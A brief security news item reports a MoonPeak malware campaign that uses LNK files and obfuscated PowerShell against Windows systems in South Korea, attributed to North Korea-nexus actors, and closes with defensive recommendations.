Windows systems in South Korea have been compromised with MoonPeak malware in advanced intrusions involving the exploitation of LNK files, according to GBHackers News.Threat actors have distributed an LNK file purporting to be financial trading guidance, which shows a decoy PDF to establish legitimacy while stealthily executing an obfuscated PowerShell script when opened, a report from Internet Initiative Japan researchers showed. While the initial PowerShell payload moves to identify virtualization environments and anti-analysis tools as it establishes persistence, the second-stage PowerShell script retrieves a masked executable from GitHub containing MoonPeak malware, which performs dynamic code decryption during execution. North Korea-nexus threat actors are believed to be behind the campaign following additional analysis of the GitHub commit email and file naming scheme.Such a threat should prompt organizations to not only track LNK file execution and whitelist applications but also implement PowerShell execution restrictions and robust endpoint detection and response systems.
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds